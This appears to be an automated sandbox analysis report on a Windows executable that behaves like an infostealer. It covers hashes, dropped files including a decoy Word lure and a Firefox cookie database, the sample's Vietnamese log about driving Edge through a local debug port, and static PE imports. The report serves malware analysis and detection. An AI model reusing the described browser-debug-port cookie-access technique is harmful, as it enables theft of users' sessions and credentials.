                                                                                                                                                                                    SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2jco13.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\Desktop\e_sqlite3.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1780736
                                                                                                                                                                                    Entropy (8bit):6.54388973247121
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:izDLT7eXc2a+xMPDBsvh58j6OQ/K4eSlrIBizB2J4bJGtpxnvUmhEocQ0x58:iTTXkMPDjj6O0d1Z9sxnvU3Z
                                                                                                                                                                                    MD5:B1A10828FADDCB586CC3A9C7A01CBBBF
                                                                                                                                                                                    SHA1:1D7EF8581F731D77C9621045C0F2712D654EBEF0
                                                                                                                                                                                    SHA-256:1D2D090188CD500EB6098701690A72F090440162A651123EAB44132525597446
                                                                                                                                                                                    SHA-512:12171C09B03BB2E163561B9B7618B3EC8566D3162A2472A63661A1F86F26118272F3A7C6608C09640D57D992DE52A840DEB41B5EB089E19D35E45D08492ACACF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: DYv2ldz5xT.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: rBFTGm5ioO.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: DYv2ldz5xT.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: rBFTGm5ioO.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: nNnzvybxiy.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: StL9joVVcT.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: #U2800.exe, Detection: malicious, Browse
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..B.........A......A......A...+..A............X...*..X......X...................N..........Rich...........................PE..d.....Xg.........." .....*................................................................`A.............................................$......(....`.......`..P............p...... _..T............................_..8............@...............................text....(.......*.................. ..`.rdata......@......................@..@.data............n..................@....pdata..P....`......."..............@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\Documents\Your_Benefits_and_Role.docx

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:Microsoft Word 2007+
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16036
                                                                                                                                                                                    Entropy (8bit):7.395550738995465
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:djbGP/uGWZmqibNxt/ZtNNjpVjan+hjregKELqJJJYc:1bGP/uJZ7iBxllNjpVjFFLC
                                                                                                                                                                                    MD5:8D226F80DA462D88E080C6BD6857550C
                                                                                                                                                                                    SHA1:8F543B99D70FFED51B1BF9C6C33791592AAD04FF
                                                                                                                                                                                    SHA-256:0AD7054EDB3D096B1D771D9E1FE393B98E11D2320124A1BEF51FFF9704D834E7
                                                                                                                                                                                    SHA-512:F3CF47989D2BF28F30F7D9867396DF8F270821C6CE298C81A226E943E4E37D194642EA1A192D77FDE9C316B417C4B082B91130A9965C6271B829EA02F895BDC0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:PK..........!.2.oWf...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.0.E......J.(....e.h...4ND.B.....81.$14.. ..{..1...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$:...B~....^.K......../P..I..~7$....i..J&B0Z.Du.t.OJ.K(H.....xG...L.+..v......dc.....W>*..\XR..m.p....Z}.....HwnM.V..n....-..")/..ZwB`.....4........s.DX...j...;A*.....c......4....[.S..9.> ......{.V.4p....W.&....A......|.d.?.......PK..........!.........N......._rels/.rels ...(...........................

                                                                                                                                                                                    C:\Users\user\Documents\~$ur_Benefits_and_Role.docx

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):162
                                                                                                                                                                                    Entropy (8bit):4.683895296054431
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MCGGhQsw1hRUDxodsYE+OaagKu:MDbyDxDD+QPu
                                                                                                                                                                                    MD5:B1A198D950CAAC6576528EB8E1A0F2EB
                                                                                                                                                                                    SHA1:4A66288E348B8488D358613500EDB890F351BF0B
                                                                                                                                                                                    SHA-256:81D393E7AAA5C77C90F564E3E4A2CA12F2D891D54137F262D7C69CEE9A76784C
                                                                                                                                                                                    SHA-512:BC6E82AA1EB35DA88E2FF245DCAD515F558D38C763B671849D0F14E8505AAEC4D8EF463BADB034CB970E6BB69DE9CF10A31E0D2F421B8DFE25BA4071967ED62E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:............................................................R..P....G...'..Q*........1..1.5...t9".q...H.NXg.@R...G.~..&.a.I.,q.}f..........$...}.j....0Z...=Aj

                                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:Non-ISO extended-ASCII text, with CRLF, LF, NEL line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):9971
                                                                                                                                                                                    Entropy (8bit):5.100031393950262
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:m4pycbsEWlb3ZssnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsGfuUELdtlnG:uYs7tEpJSxrSVd2hSv+RyI+TM
                                                                                                                                                                                    MD5:82FB1D3F3AF7A0D9780A2D048D33531C
                                                                                                                                                                                    SHA1:B70B095BF163E491B5211217F172CD45CE222C9E
                                                                                                                                                                                    SHA-256:2B258FE3A08B25EC3790E613ED8BDB268879DB599E55BC0453E83DE3E93840BE
                                                                                                                                                                                    SHA-512:667FAB25587E13E8EBD2A429F4D67E7FB76FF6A6C5834DCB0CA7E8F3A47E447FCF0F2ECDE6A24431A544E4588544D4056E0E05CFEEFBC48FE195730CE7310ACF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:Dang t?i file Dual.....? Kh.ng t.m th?y d? li?u ngu?i d.ng cho CocCoc...? Dang x? l. profile Default c?a Edge...?? D. c?p ph.t c?ng 9723 cho Edge - Default..?? D. kh?i ch?y Edge v?i ch? d? debug t?i c?ng 9723...File Dual d. t?i xong t?i: Your_Benefits_and_Role.docx..? Tr.nh duy?t d. s?n s.ng t?i c?ng 9723...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                    Entropy (8bit):6.922133192689838
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:hJ1bl8p7dJ.exe
                                                                                                                                                                                    File size:26'345'984 bytes
                                                                                                                                                                                    MD5:73d8502f47e5c7b9b4851ee47692105c
                                                                                                                                                                                    SHA1:98efc25148a119cbe7d9b421d4eff9d784c70dcb
                                                                                                                                                                                    SHA256:ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f
                                                                                                                                                                                    SHA512:0d49b8f531acfb8d5c0a8b26d167b27bdcaf85426efc08d84767af7d043406c958198efb7d8c575cdde0bbcf2993baad4f00d315d4e8cb53e0963aae593e02c9
                                                                                                                                                                                    SSDEEP:393216:PiW+4AEgZE3AKFg3kKyNhdYzXUxvlam+mb:aybJNhdYzXUxvgm
                                                                                                                                                                                    TLSH:FA47AE10A3E80A66E4BB9734C575D233CAB1BD625736D60F154CF29A1F73B418A2B732
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Eu..+&..+&..+&..('..+&../'..+&...'..+&...&..+&..*'..+&..*&I~+&..('..+&../'..+&..+&..+&...'..+&o.+'..+&o.)'..+&Rich..+&.......

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Entrypoint:0x140081c20
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x6782DDCE [Sat Jan 11 21:08:30 2025 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:909f404ae07032179af833ba3488037a

                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                    Instruction
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                    call 00007F2DD90659D0h
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                    jmp 00007F2DD9064FB7h
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    jmp 00007F2DD9065D4Ch
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                    call 00007F2DD9065D48h
                                                                                                                                                                                    jmp 00007F2DD9065144h
                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                    ret
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                    dec ebp
                                                                                                                                                                                    mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    mov ecx, edx
                                                                                                                                                                                    dec ecx
                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                    call 00007F2DD9065152h
                                                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                    ret
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    inc eax
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    inc ebp
                                                                                                                                                                                    mov ebx, dword ptr [eax]
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    mov ebx, edx
                                                                                                                                                                                    inc ecx
                                                                                                                                                                                    and ebx, FFFFFFF8h
                                                                                                                                                                                    dec esp
                                                                                                                                                                                    mov ecx, ecx
                                                                                                                                                                                    inc ecx
                                                                                                                                                                                    test byte ptr [eax], 00000004h
                                                                                                                                                                                    dec esp
                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                    je 00007F2DD9065155h
                                                                                                                                                                                    inc ecx
                                                                                                                                                                                    mov eax, dword ptr [eax+08h]
                                                                                                                                                                                    dec ebp
                                                                                                                                                                                    arpl word ptr [eax+04h], dx
                                                                                                                                                                                    neg eax
                                                                                                                                                                                    dec esp
                                                                                                                                                                                    add edx, ecx
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    arpl ax, cx
                                                                                                                                                                                    dec esp
                                                                                                                                                                                    and edx, ecx
                                                                                                                                                                                    dec ecx
                                                                                                                                                                                    arpl bx, ax
                                                                                                                                                                                    dec edx
                                                                                                                                                                                    mov edx, dword ptr [eax+edx]
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                    test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                    je 00007F2DD906514Dh
                                                                                                                                                                                    movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                    and eax, FFFFFFF0h
                                                                                                                                                                                    dec esp
                                                                                                                                                                                    add ecx, eax
                                                                                                                                                                                    dec esp
                                                                                                                                                                                    xor ecx, edx
                                                                                                                                                                                    dec ecx
                                                                                                                                                                                    mov ecx, ecx
                                                                                                                                                                                    pop ebx
                                                                                                                                                                                    jmp 00007F2DD906515Ah
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                    dec eax
                                                                                                                                                                                    cmp ecx, dword ptr [01B76859h]

                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                    Data Directories

                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x1be83f00x54.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1be84440x168.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ccf0000x5ca.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c2d0000xa1610.pdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cd00000x1fa4.reloc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1a95d400x54.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x1a95f000x28.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1a95c000x140.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xc3b0000xcd0.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                    Sections

                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x8f0a80x8f20092bae1c68c77d6ea6599f1fc8d6af263False0.42769855349344976data6.670993833104685IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .managed0x910000x82f5380x82f6004fcd80ee48a273c1013e5fefa574e5d5unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    hydrated0x8c10000x379b400x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .rdata0xc3b0000xfaffa40xfb0000c3c116d0af4ee6195e26beb200dee7fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0x1beb0000x41af80xd800ba6af6b14abd3ae05cb5e772901bc444False0.27982132523148145data5.047550193321382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .pdata0x1c2d0000xa16100xa180035bb3a5f46ffcf63a8d77bf0c368e293False0.49356617647058826data6.771150075529739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rsrc0x1ccf0000x5ca0x6008a873b789d674de2acd28dba2fc43b6eFalse0.4322916666666667data4.197636384253982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .reloc0x1cd00000x1fa40x2000079f1541473d7592616cedddfe735b2eFalse0.217529296875data5.446759262376985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                    Resources

                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                    RT_VERSION0x1ccf0a00x340data0.42427884615384615
                                                                                                                                                                                    RT_MANIFEST0x1ccf3e00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                    Imports

                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumKeyExW, RegEnumValueW, GetTokenInformation, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser
                                                                                                                                                                                    bcrypt.dllBCryptGenRandom, BCryptDecrypt, BCryptExportKey, BCryptFinishHash, BCryptGetProperty, BCryptHashData, BCryptImportKey, BCryptImportKeyPair, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptCloseAlgorithmProvider, BCryptDestroyHash, BCryptCreateHash, BCryptDestroyKey, BCryptEncrypt
                                                                                                                                                                                    CRYPT32.dllCryptProtectData, CryptUnprotectData, CertFreeCertificateChainEngine, CertCloseStore, PFXImportCertStore, PFXExportCertStore, CryptFindOIDInfo, CryptQueryObject, CryptMsgGetParam, CryptMsgClose, CryptImportPublicKeyInfoEx2, CryptFormatObject, CryptDecodeObject, CertVerifyTimeValidity, CertSetCertificateContextProperty, CertSerializeCertificateStoreElement, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertGetCertificateContextProperty, CryptProtectMemory, CryptUnprotectMemory, CertAddCertificateContextToStore, CertAddCertificateLinkToStore, CertControlStore, CertCreateCertificateChainEngine, CertFindCertificateInStore, CertFindExtension, CertFreeCertificateChain, CertGetCertificateChain, CertGetIntendedKeyUsage, CertGetNameStringW, CertGetValidUsages, CertNameToStrW, CertOpenStore, CertSaveStore
                                                                                                                                                                                    IPHLPAPI.DLLGetAdaptersAddresses, GetPerAdapterInfo, GetNetworkParams, if_nametoindex
                                                                                                                                                                                    KERNEL32.dllRtlUnwindEx, RtlPcToFileHeader, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, RaiseException, UnhandledExceptionFilter, QueryPerformanceCounter, SetLastError, FormatMessageW, GetLastError, GetCPInfoExW, GetConsoleMode, GetFileType, ReadFile, ReadConsoleW, WriteFile, WriteConsoleW, GetConsoleOutputCP, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetTickCount64, K32EnumProcessModulesEx, CloseHandle, IsWow64Process, GetExitCodeProcess, CreateProcessW, TerminateProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, QueryFullProcessImageNameW, CreatePipe, GetCurrentProcess, GetConsoleCP, GetLogicalDrives, GetProcAddress, LoadLibraryW, LoadLibraryExW, CancelIoEx, CloseThreadpoolIo, GetCurrentProcessId, RaiseFailFastException, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, EnumSystemLocalesEx, ResolveLocaleName, LCIDToLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetCurrentThread, WaitForSingleObject, Sleep, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, InitializeCriticalSection, InitializeConditionVariable, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForMultipleObjectsEx, GetCurrentThreadId, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, GetCPInfo, LocalAlloc, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CancelSynchronousIo, CreateIoCompletionPort, CopyFileExW, CreateDirectoryW, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, ExpandEnvironmentStringsW, FindNextFileW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileAttributesExW, GetFileInformationByHandleEx, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, OpenThread, QueryUnbiasedInterruptTime, RemoveDirectoryW, SetFileAttributesW, SetFileInformationByHandle, SetFilePointerEx, SetThreadErrorMode, CreateThread, ResumeThread, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, GetCurrentProcessorNumberEx, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, SetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, EncodePointer, DecodePointer, HeapCreate, HeapDestroy, HeapAlloc, HeapFree, GetProcessHeap, RtlLookupFunctionEntry
                                                                                                                                                                                    ncrypt.dllNCryptOpenStorageProvider, NCryptOpenKey, NCryptFreeObject, NCryptDeleteKey, NCryptImportKey, NCryptSetProperty, NCryptGetProperty
                                                                                                                                                                                    ole32.dllCoGetObjectContext, CoInitializeEx, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, CoGetApartmentType, CoGetContextToken, CoCreateGuid, CLSIDFromProgID, CoWaitForMultipleHandles
                                                                                                                                                                                    OLEAUT32.dllVariantClear, SysFreeString, SysAllocStringLen
                                                                                                                                                                                    USER32.dllLoadStringW
                                                                                                                                                                                    WS2_32.dllWSAIoctl, WSAEventSelect, FreeAddrInfoExW, WSACleanup, WSAStartup, bind, WSARecv, WSAGetOverlappedResult, WSAConnect, shutdown, setsockopt, send, getpeername, getsockopt, select, ioctlsocket, recv, WSASend, closesocket, GetNameInfoW, GetAddrInfoW, FreeAddrInfoW, WSASocketW, GetAddrInfoExW
                                                                                                                                                                                    api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode, _callnewh, calloc, realloc, malloc
                                                                                                                                                                                    api-ms-win-crt-math-l1-1-0.dllnanf, fmod, fmodf, __setusermatherr, ceil, cos, exp, floor, log, log10, pow, sin, tan, modf, ceilf, cosf, expf, floorf, logf, powf, sinf, modff, log2, atan2, fma, acosh, asinh, atanh, cosh, sinh, tanh, cbrt, acos, asin, atan, log2f, atan2f, fmaf, acoshf, asinhf, atanhf, coshf, sinhf, tanhf, log10f, cbrtf, acosf, asinf, atanf, tanf, nan
